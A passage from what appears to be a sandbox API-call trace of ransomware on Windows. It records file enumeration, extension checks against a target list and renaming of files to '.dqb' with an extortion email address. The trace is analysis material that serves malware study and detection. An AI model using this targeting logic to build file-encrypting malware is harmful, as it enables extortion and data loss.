lpString2=".xml") returned 1 [0270.489] lstrlenW (lpString=".rar") returned 4 [0270.489] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString=".bz2") returned 4 [0270.489] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString=".7z") returned 3 [0270.489] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString=".dbf") returned 4 [0270.489] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString=".1cd") returned 4 [0270.489] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString=".jpg") returned 4 [0270.489] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString=".doc") returned 4 [0270.490] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString=".docx") returned 5 [0270.490] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0270.490] lstrlenW (lpString=".pdf") returned 4 [0270.490] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString=".xls") returned 4 [0270.490] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString=".xlsx") returned 5 [0270.490] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0270.490] lstrlenW (lpString=".ppt") returned 4 [0270.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString=".zip") returned 4 [0270.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.490] lstrlenW (lpString=".rar") returned 4 [0270.490] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString=".bz2") returned 4 [0270.490] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString=".7z") returned 3 [0270.490] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString=".dbf") returned 4 [0270.490] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString=".1cd") returned 4 [0270.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.490] lstrlenW (lpString=".jpg") returned 4 [0270.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.491] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.491] lstrlenW (lpString="numbers.xml") returned 11 [0270.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.570] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=209) returned 1 [0270.570] CloseHandle (hObject=0x314) returned 1 [0270.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml")) returned 0x20 [0270.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.570] lstrlenW (lpString=".doc") returned 4 [0270.570] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.570] lstrlenW (lpString=".docx") returned 5 [0270.570] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0270.570] lstrlenW (lpString=".pdf") returned 4 [0270.570] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.570] lstrlenW (lpString=".xls") returned 4 [0270.570] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.570] lstrlenW (lpString=".xlsx") returned 5 [0270.570] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0270.570] lstrlenW (lpString=".ppt") returned 4 [0270.571] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString=".zip") returned 4 [0270.571] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.571] lstrlenW (lpString=".rar") returned 4 [0270.571] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString=".bz2") returned 4 [0270.571] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString=".7z") returned 3 [0270.571] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString=".dbf") returned 4 [0270.571] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString=".1cd") returned 4 [0270.571] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString=".jpg") returned 4 [0270.571] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.571] lstrlenW (lpString=".doc") returned 4 [0270.571] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString=".docx") returned 5 [0270.571] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0270.571] lstrlenW (lpString=".pdf") returned 4 [0270.571] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString=".xls") returned 4 [0270.571] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.571] lstrlenW (lpString=".xlsx") returned 5 [0270.571] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0270.572] lstrlenW (lpString=".ppt") returned 4 [0270.572] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.572] lstrlenW (lpString=".zip") returned 4 [0270.572] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.572] lstrlenW (lpString=".rar") returned 4 [0270.572] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.572] lstrlenW (lpString=".bz2") returned 4 [0270.572] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.572] lstrlenW (lpString=".7z") returned 3 [0270.572] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.572] lstrlenW (lpString=".dbf") returned 4 [0270.572] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.572] lstrlenW (lpString=".1cd") returned 4 [0270.572] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0270.572] lstrlenW (lpString=".jpg") returned 4 [0270.572] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.572] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.572] lstrlenW (lpString="osknumpadbase.xml") returned 17 [0270.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1437) returned 1 [0270.573] CloseHandle (hObject=0x314) returned 1 [0270.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0x20 [0270.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.573] lstrlenW (lpString=".doc") returned 4 [0270.573] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString=".docx") returned 5 [0270.574] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0270.574] lstrlenW (lpString=".pdf") returned 4 [0270.574] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString=".xls") returned 4 [0270.574] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString=".xlsx") returned 5 [0270.574] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0270.574] lstrlenW (lpString=".ppt") returned 4 [0270.574] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString=".zip") returned 4 [0270.574] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.574] lstrlenW (lpString=".rar") returned 4 [0270.574] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString=".bz2") returned 4 [0270.574] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString=".7z") returned 3 [0270.574] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString=".dbf") returned 4 [0270.574] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString=".1cd") returned 4 [0270.574] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString=".jpg") returned 4 [0270.574] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.574] lstrlenW (lpString=".doc") returned 4 [0270.574] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString=".docx") returned 5 [0270.575] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0270.575] lstrlenW (lpString=".pdf") returned 4 [0270.575] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString=".xls") returned 4 [0270.575] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString=".xlsx") returned 5 [0270.575] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0270.575] lstrlenW (lpString=".ppt") returned 4 [0270.575] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.575] lstrlenW (lpString=".zip") returned 4 [0270.575] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.575] lstrlenW (lpString=".rar") returned 4 [0270.575] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString=".bz2") returned 4 [0270.575] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString=".7z") returned 3 [0270.575] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.575] lstrlenW (lpString=".dbf") returned 4 [0270.575] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.575] lstrlenW (lpString=".1cd") returned 4 [0270.575] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0270.575] lstrlenW (lpString=".jpg") returned 4 [0270.575] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.575] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.575] lstrlenW (lpString="osknumpad.xml") returned 13 [0270.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.576] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=219) returned 1 [0270.576] CloseHandle (hObject=0x314) returned 1 [0270.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0x20 [0270.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString=".doc") returned 4 [0270.577] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString=".docx") returned 5 [0270.577] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0270.577] lstrlenW (lpString=".pdf") returned 4 [0270.577] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString=".xls") returned 4 [0270.577] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString=".xlsx") returned 5 [0270.577] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0270.577] lstrlenW (lpString=".ppt") returned 4 [0270.577] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString=".zip") returned 4 [0270.577] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.577] lstrlenW (lpString=".rar") returned 4 [0270.577] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString=".bz2") returned 4 [0270.577] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString=".7z") returned 3 [0270.577] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString=".dbf") returned 4 [0270.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString=".1cd") returned 4 [0270.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString=".jpg") returned 4 [0270.577] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.578] lstrlenW (lpString=".doc") returned 4 [0270.578] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString=".docx") returned 5 [0270.578] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0270.578] lstrlenW (lpString=".pdf") returned 4 [0270.578] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString=".xls") returned 4 [0270.578] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString=".xlsx") returned 5 [0270.578] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0270.578] lstrlenW (lpString=".ppt") returned 4 [0270.578] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.578] lstrlenW (lpString=".zip") returned 4 [0270.578] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.578] lstrlenW (lpString=".rar") returned 4 [0270.578] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString=".bz2") returned 4 [0270.578] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString=".7z") returned 3 [0270.578] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.578] lstrlenW (lpString=".dbf") returned 4 [0270.578] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.578] lstrlenW (lpString=".1cd") returned 4 [0270.578] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0270.578] lstrlenW (lpString=".jpg") returned 4 [0270.578] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.579] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.579] lstrlenW (lpString="oskpredbase.xml") returned 15 [0270.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.579] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=924) returned 1 [0270.579] CloseHandle (hObject=0x314) returned 1 [0270.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0x20 [0270.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString=".doc") returned 4 [0270.580] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString=".docx") returned 5 [0270.580] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0270.580] lstrlenW (lpString=".pdf") returned 4 [0270.580] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString=".xls") returned 4 [0270.580] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString=".xlsx") returned 5 [0270.580] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0270.580] lstrlenW (lpString=".ppt") returned 4 [0270.580] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString=".zip") returned 4 [0270.580] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.580] lstrlenW (lpString=".rar") returned 4 [0270.580] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString=".bz2") returned 4 [0270.580] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString=".7z") returned 3 [0270.580] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString=".dbf") returned 4 [0270.580] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString=".1cd") returned 4 [0270.580] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.580] lstrlenW (lpString=".jpg") returned 4 [0270.581] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString=".doc") returned 4 [0270.581] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString=".docx") returned 5 [0270.581] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0270.581] lstrlenW (lpString=".pdf") returned 4 [0270.581] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.581] lstrlenW 